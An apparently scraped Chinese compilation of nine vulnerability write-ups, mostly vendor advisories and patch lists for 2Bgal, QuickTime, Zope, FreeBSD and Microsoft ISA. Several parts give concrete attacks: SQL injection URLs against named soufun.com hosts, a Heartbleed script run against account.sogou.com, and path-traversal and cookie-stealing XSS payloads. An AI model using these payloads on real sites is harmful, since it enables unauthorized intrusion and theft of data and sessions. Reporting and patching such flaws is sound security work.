“法音”通过精心收集,向本站投稿了9篇2Bgal admin/phpinfo.php脚本信息泄露漏洞,以下文章小编为您整理后的2Bgal admin/phpinfo.php脚本信息泄露漏洞,供大家阅读。

2Bgal admin/phpinfo.php脚本信息泄露漏洞

篇1:2Bgal admin/phpinfo.php脚本信息泄露漏洞

影响版本:

2Bgal 3.1.2

程序介绍:

2BGal是用于发布照片、相册的PHP/MySQL脚本,

漏洞分析:

2BGal的admin/phpinfo.php脚本对phpinfo函数的调用是公开可访问的,远程攻击者可以通过直接请求文件泄露PHP配置信息。

解决方案:

厂商补丁:

Ben3w

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.ben3w.com/multimedia/devphp_2bgal.php

链接:secunia.com/advisories/35586/

*>

篇2:Apple QuickTime信息泄露漏洞漏洞预警

发布日期:-10-28

更新日期:2011-10-28

受影响系统:

Apple QuickTime Player 7.x

不受影响系统:

Apple QuickTime Player 7.7.1

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 50130

CVE ID: CVE-2011-3220

QuickTime是由苹果电脑所开发的一种多媒体架构,能够处理许多的数字视频、媒体段落、音效、文字、动画、音乐格式,以及交互式全景影像的数项类型,

Apple QuickTime信息泄露漏洞漏洞预警

Apple QuickTime在处理视频文件中的URL数据处理程序时存在未初始化内存访问问题,攻击者可利用此漏洞读取内存内容。

链接:support.apple.com/kb/HT5016

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

Apple

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

support.apple.com/

篇3:Zope CSVTable远程文件信息泄露漏洞

受影响系统:Debian Linux 3.1

Zope Zope 2.8.8

Zope Zope 2.7.5描述:

BUGTRAQ  ID: 2

CVE(CAN) ID: CVE--4684

Zope是一款基于Python的开放源代码内容管理系统服务程序,

Zope在处理网页标记时存在漏洞,远程攻击者可能利用此漏洞非授权访问文件。

Zope没有在包含有ReST标记的Web页面中禁用csv_table指令,导致泄漏Zope服务器可读的文件。

链接:www.debian.org/security//dsa-1176

*>

建议:

厂商补丁:

Debian

------

Debian已经为此发布了一个安全公告(DSA-1176-1)以及相应补丁:

DSA-1176-1:New zope2.7 packages fix information disclosure

链接:www.debian.org/security/2005/dsa-1176

补丁下载:

Source archives:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.dsc

Size/MD5 checksum:      906 b4ea5636227d16c5df630894d2b76967

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.diff.gz

Size/MD5 checksum:    51399 ee75bf3e88b6eb161ccc431e1077bce8

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5.orig.tar.gz

Size/MD5 checksum:  2885871 5b5c5823c62370d9f7325c6014a49d8b

Alpha architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_alpha.deb

2Bgal adminphpinfo.php脚本信息泄露漏洞Size/MD5 checksum:  2669566 2c4d8fb2ac3e9dba4f7de9caf0868b51

AMD64 architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_amd64.deb

Size/MD5 checksum:  2661080 8108a298111e6abad30073cbd002093e

ARM architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_arm.deb

Size/MD5 checksum:  2616068 9d77c1ccce693668a3a7e2bb0f35491d

HP Precision architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_hppa.deb

Size/MD5 checksum:  2736774 1fd5611ff6fa57d561b15bae9d836fe7

Intel IA-32 architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_i386.deb

Size/MD5 checksum:  2608554 779c9e75c919a1d39d0db7a9a6fc14d9

Intel IA-64 architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_ia64.deb

Size/MD5 checksum:  2959538 d800e88a7a988d9bb0db833df57f074a

Motorola 680x0 architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_m68k.deb

Size/MD5 checksum:  2601510 cdd9b090bf745ab74545361936b415c8

Big endian MIPS architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mips.deb

Size/MD5 checksum:  2675666 260205e53eb3802ad50c4adcc8ac0d5f

Little endian MIPS architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mipsel.deb

Size/MD5 checksum:  2678458 dc9af18e0027a9fb7ae507ff33e050b9

PowerPC architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_powerpc.deb

Size/MD5 checksum:  2723958 90e0b09a7f8d299a60c09947b86a72e5

IBM S/390 architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_s390.deb

Size/MD5 checksum:  2663150 a5f76f5bc20b8fde2ed6ffcf24dffa33

Sun Sparc architecture:

security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_sparc.deb

Size/MD5 checksum:  2670708 66e3bd2e47d38d33bf951711e59f7592

补丁安装方法:

1. 手工安装补丁包:

首先,使用下面的命令来下载补丁软件:

# wget url  (url是补丁下载链接地址)

然后,使用下面的命令来安装补丁:

# dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

首先,使用下面的命令更新内部数据库:

# apt-get update

然后,使用下面的命令安装更新软件包:

# apt-get upgrade

篇4:metinfo3.0 敏感信息泄露与跨站漏洞及修复

metinfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构的,在设计的时候出现两个错误,敏感信息泄露与跨站。

metinfo3.0 文件代码泄露

EXp :localhost/metinfo/templates/met001/../../config

metinfo3.0 XSS 跨站漏洞

exploit :

alert(document.cookie)localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1

修复:暂时过滤等待官方升级

篇5:搜房网多个分站存在注射漏洞及敏感信息泄露

简要描述:注射可导致主机相关信息泄露,以及进一步的渗透,望管理员及时修复,以免造成对主机安全影响。

详细说明:1、

njbbs.soufun.com/zhuanti/njxn/njxnvote.asp

?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects

2、

nree.soufun.com/spring/guangzhou/show2.asp

?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects

3、

dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1

4、

szesftest.soufun.com/sechouse2/products.asp

?BigClassName=%B6%FE%CA%D6%B7%BF

&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1

漏洞证明:1、

njbbs.soufun.com/zhuanti/njxn/njxnvote.asp

?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects

2、

nree.soufun.com/2007spring/guangzhou/show2.asp

?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects

3、

dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1

4、

szesftest.soufun.com/sechouse2/products.asp

?BigClassName=%B6%FE%CA%D6%B7%BF

&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1

www.soufun.com/space/Other/Posts.aspx?userid=5469987

泄露信息主机路径:

Source File: e:\soufun\spacen.soufun.com\Other\Posts.aspx Line: 6

Line 4: <%@ MasterType VirtualPath=“~/Visit.Master” %>

Line 5:

Line 6:     <%=Master.visitUser.UserName%>- 家庭空间- 搜房网

Line 7:

Line 8:

修复方案:过滤

作者 孤狐浪子

篇6:FreeBSD openpty pty处理多个本地信息泄露漏洞

受影响系统:FreeBSD FreeBSD 7.0FreeBSD FreeBSD 6.3FreeBSD FreeBSD 6.2FreeBSD FreeBSD 6.1FreeBSD FreeBSD 5.5FreeBSD FreeBSD 5.0描述:FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,FreeBSD在处理pty的

受影响系统:

FreeBSD FreeBSD 7.0

FreeBSD FreeBSD 6.3

FreeBSD FreeBSD 6.2

FreeBSD FreeBSD 6.1

FreeBSD FreeBSD 5.5

FreeBSD FreeBSD 5.0描述:

FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,

FreeBSD在处理pty的权限时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。FreeBSD的openpty函数在为打开的伪终端设置权限时存在错误,恶意的本地用户可以通过执行内部调用了openpty()的程序从非 root用户所打开的pty读取文本;此外ptsname(3)函数错误的从/dev中的设备节点名获得了两个字符,但没有核实是否在操作调用用户所拥有的有效pty。pt_chown使用了ptsname(3)的错误结果将pty的所有权更改到调用pt_chown的用户,这样本地用户就可以获得正常情况下应受限的所有权。厂商补丁:

FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-08:01)以及相应补丁:

FreeBSD-SA-08:01:pty snooping

链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:01.pty.asc

篇7:微软发服务器软件补丁 漏洞被利用泄露信息

微软公司9 日说,微软服务器软件内含一个弱点,可能遭 利用,导致商务使用者误上贼船,甚至泄露个人信息,微软已发布修补程序解决此问题。

这项弱点影响微软的互联网安全与加速(ISA )服务器软件,此软件兼具防火墙、内容过滤器和网页内容缓存的功用。该软件除了当作独立产品销售外,也并入微软小企业服务器套装软件(Small Business Server )出售。

微软Proxy Server 2.0产品也受影响。

微软把此安全漏洞的警戒层级评为次高的“重要”级,并发布修补程序。

微软在例行发布的资安月报中声明:“使用者可能以为存取的是受信赖的互联网内容,但其实存取的却是恶意网络内容,例如包藏祸心的网站。”

此瑕疵影响ISA 服务器的一种功能:缓存(cache )网页内容以加速存取经常造访网站。此功能把甲职员曾造访网站上的大形图文文件存在缓存内存内,一旦乙职员上相同的网站,图文就会立刻呈现出来。但ISA 安全漏洞可能让 在缓存内存内插入恶意的内容,例如仿冒的表格,并更改内容标示,比方说把它重新标明为传自某银行网站的表格,

防毒软件公司赛门铁克(Symantec)提醒企业当心,ISA 的这项安全漏洞可能被有心人士用来窃取顾客的私密信息。把使用者诱上某恶意网站后, 可能伪造表格,佯装成传自正宗的网域。

要提防这类威胁,赛门铁克建议使用者,切勿点选通往不知名网站的链接。

“随着网络钓鱼(phishing)攻击愈来愈猖獗,此弱点可能提供另一个收集身分信息的平台,”赛门铁克安全应变中心资深经理Oliver Friedrichs说。

微软从一年前开始每月发布资安公告,本月公布的瑕疵仅ISA 服务器一项,比以往大有改善。10月份微软同一天就公布20多项软件瑕疵。

此瑕疵不影响ISA Server 。至于受影响的ISA Server 2000 和Proxy Server 2.0,微软建议系统管理员安装最新修补程序,或把受影响系统上的网域名称服务(DNS )缓存设定值改为零,即可预防 利用此瑕疵作怪。

篇8:搜狗通行证服务器运维不当导致信息泄露漏洞预警

这里搜狗通行证可以读取到cookie的内容,所以还是很重要的。

python openssl.py account.sogou.com

修复方案:

1、只影响 openssl 1.0.1 到 1.0.1f 版本,还有 openssl 1.0.2 beta 版本,其他版本不受影响,不受影响的版本不需要进行修复

2、1.0.1g 版本已经修复该漏洞,如果服务器上 openssl 版本存在该漏洞请升级到这个版本

篇9:快用苹果助手Xss进后台导致信息泄露脚本安全

简要描述:

快用苹果助手,存在储存型XSS,秒偷cookie进后台,

详细说明:

注册一个开发者合作帐号。

创建一个应用

developer.kuaiyong.com/app.php?do=app_add

抓包修改,在应用名称后加入Xss测试代码;

提交之后

然后我去倒了杯水,cookie就到了,

alt=“2.jpg” />

紧接着

漏洞证明:

信息泄露

修复方案:

过滤、一定要过滤

阅读剩余 0%
本站所有文章资讯、展示的图片素材等内容均为注册用户上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考。 用户通过本站上传、发布的任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们反馈本站将在三个工作日内改正。